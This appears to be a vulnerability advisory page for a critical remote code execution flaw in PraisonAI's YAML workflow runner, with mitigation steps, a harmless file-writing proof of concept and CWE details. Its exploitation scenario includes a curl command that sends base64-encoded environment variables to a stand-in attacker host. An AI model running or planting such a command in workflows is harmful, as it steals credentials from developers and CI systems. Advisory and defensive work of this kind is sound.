GHSA-vc46-vw85-3wvm: PraisonAI: RCE via malicious workflow YAML execution
GHSA-vc46-vw85-3wvm CRITICALPraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.
What is the risk?
CRITICAL. CVSS 9.8 with AV:N/AC:L/PR:N/UI:N reflects the full blast radius: any environment running PraisonAI workflows against externally-sourced YAML is fully exploitable without restriction. In CI/CD contexts — the primary use case for AI agent orchestration — this becomes a direct supply chain attack vector with near-zero exploitation barrier. The 41 prior CVEs in the same package indicate a systemic security debt warranting elevated scrutiny beyond this single vulnerability. No CISA KEV listing yet, but the trivial exploit primitive and widespread CI usage make active exploitation a near-term certainty.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.5.138 | 4.5.139 |
| PraisonAI Agents | pip | <= 1.5.139 | 1.5.140 |
How severe is it?
What is the attack surface?
What should I do?
6 steps-
IMMEDIATE
Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140.
-
AUDIT
Review all YAML workflow files in CI/CD pipelines and repositories for malicious
run:,script:, orpython:entries. -
RESTRICT
Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits.
-
SANDBOX
Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks.
-
DETECT
Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes.
-
ROTATE
If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is GHSA-vc46-vw85-3wvm?
PraisonAI's workflow engine blindly executes shell commands and Python code embedded in YAML files passed to `praisonai workflow run`, with zero sandboxing or input validation — a CVSS 9.8 vulnerability requiring no privileges and no interaction beyond the victim running a workflow. This is trivially exploitable: any attacker who can deliver a malicious YAML file through a shared repository, CI/CD pipeline, or social engineering achieves full host compromise. The package carries 41 prior CVEs, signaling a systemic pattern of security debt that compounds risk. Patch to praisonai ≥ 4.5.139 and praisonaiagents ≥ 1.5.140 immediately, audit all YAML workflow files in CI/CD pipelines for untrusted content, and restrict external YAML sources until patched.
Is GHSA-vc46-vw85-3wvm actively exploited?
No confirmed active exploitation of GHSA-vc46-vw85-3wvm has been reported, but organizations should still patch proactively.
How to fix GHSA-vc46-vw85-3wvm?
1. IMMEDIATE: Upgrade praisonai to ≥ 4.5.139 and praisonaiagents to ≥ 1.5.140. 2. AUDIT: Review all YAML workflow files in CI/CD pipelines and repositories for malicious `run:`, `script:`, or `python:` entries. 3. RESTRICT: Allowlist YAML sources — execute workflows only from trusted, version-controlled repositories with signed commits. 4. SANDBOX: Run praisonai workflow commands in isolated containers with minimal privileges and no access to sensitive credentials or production networks. 5. DETECT: Alert on unexpected subprocess spawns or Python exec() calls originating from praisonai processes. 6. ROTATE: If praisonai has been running in CI, rotate all credentials accessible from that environment as a precaution.
What systems are affected by GHSA-vc46-vw85-3wvm?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, CI/CD pipelines, multi-agent orchestration, training pipelines.
What is the CVSS score for GHSA-vc46-vw85-3wvm?
GHSA-vc46-vw85-3wvm has a CVSS v3.1 base score of 9.8 (CRITICAL).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.005 AI Agent Tool AML.T0011 User Execution AML.T0011.000 Unsafe AI Artifacts AML.T0050 Command and Scripting Interpreter AML.T0053 AI Agent Tool Invocation AML.T0072 Reverse Shell Compliance Controls Affected
What are the technical details?
Original Advisory
`praisonai workflow run <file.yaml>` loads untrusted YAML and if `type: job` executes steps through `JobWorkflowExecutor` in job_workflow.py. This supports: - `run:` → shell command execution via `subprocess.run()` - `script:` → inline Python execution via `exec()` - `python:` → arbitrary Python script execution A malicious YAML file can execute arbitrary host commands. ### Affected Code - workflow.py → `action_run()` - job_workflow.py → `_exec_shell()`, `_exec_inline_python()`, `_exec_python_script()` ### PoC Create `exploit.yaml`: ```yaml type: job name: exploit steps: - name: write-file run: python -c "open('pwned.txt','w').write('owned')" ``` Run: ```bash praisonai workflow run exploit.yaml ``` ### Reproduction Steps 1. Save the YAML above as `exploit.yaml`. 2. Execute `praisonai workflow run exploit.yaml`. 3. Confirm `pwned.txt` appears in the working directory. ### Impact Remote or local attacker-supplied workflow YAML can execute arbitrary host commands and code, enabling full system compromise in CI or shared deployment contexts. **Reporter:** Lakshmikanthan K (letchupkt)
Exploitation Scenario
An adversary targeting an organization's AI development pipeline uploads a malicious `automation.yaml` to a shared workflow repository or submits it via a GitHub PR to a CI/CD job. The file contains a `type: job` step with `run: curl attacker.com/exfil -d "$(env | base64)"`, which silently exfiltrates all environment variables — including OpenAI API keys, AWS credentials, and database connection strings — the moment any developer or automated job runs `praisonai workflow run automation.yaml`. With zero prerequisites, no authentication, and no special knowledge required, the attacker achieves full host compromise. In multi-agent deployments where PraisonAI orchestrates downstream AI tools, the blast radius extends to all connected systems and their credentials.
Weaknesses (CWE)
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Primary
CWE-94 Improper Control of Generation of Code ('Code Injection')
Primary
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
GHSA-vmmj-pfw7-fjwp 9.9 praisonai: sandbox escape gives RCE via codeMode tool
Same package: praisonai CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonai CVE-2026-47410 9.8 praisonai-platform: hardcoded JWT → full account takeover
Same package: praisonai GHSA-9qhq-v63v-fv3j 9.8 PraisonAI: RCE via MCP command injection
Same package: praisonai CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai